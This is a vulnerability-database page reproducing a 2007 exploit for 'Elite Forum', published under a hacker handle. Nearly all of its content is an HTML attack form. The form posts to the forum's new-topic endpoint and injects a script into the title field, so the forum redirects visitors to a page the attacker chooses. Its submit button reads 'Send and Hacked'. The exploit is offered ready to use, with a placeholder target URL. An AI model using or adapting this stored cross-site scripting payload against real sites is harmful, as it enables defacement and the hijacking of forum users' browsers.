Lucene search

K
securityvulns
SecurityvulnsSECURITYVULNS:DOC:17566
HistoryJul 22, 2007 - 12:00 a.m.

Elite Forum Full HTML ENject versin 1.0.0.0

2007-07-2200:00:00
vulners.com
95

c0ded: St@rExT
From : Turkey
exploit:

<title>Elite Forum FULL HTML ENjocter-By St@rEXT</title>
<style>
body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg&#41;;
color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&amp;fid=1&quot; target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By St@rEXT</b></h2></em></b></font>
<br>

    &lt;b&gt;Your HTML C0de : &lt;br&gt;&lt;/b&gt; 
    &lt;input  size=&quot;60&quot; type=&quot;text&quot;  name=&quot;title&quot; value=&#39;&lt;script&gt;location=&quot;http://yourindex.html&quot;&lt;/script&gt;&#39;&gt;

    &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;b&gt;Forum Messages:&lt;/b&gt;&lt;BR&gt;

    &lt;input cols=2 rows=1 name=&#39;post&#39;value=&#39;Bug On!!!&#39;&gt;&lt;BR&gt;&lt;BR&gt;&lt;br&gt;

<input type=submit value="Send and Hacked">
<BR><BR>

    &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
    &lt;/form&gt;
Use Vulners API to create your own security tool

API usage cases
  • Network scanning
  • Linux Patch management
  • Threat protection
  • No network audit solution

Ways of integration

Integrate Vulners API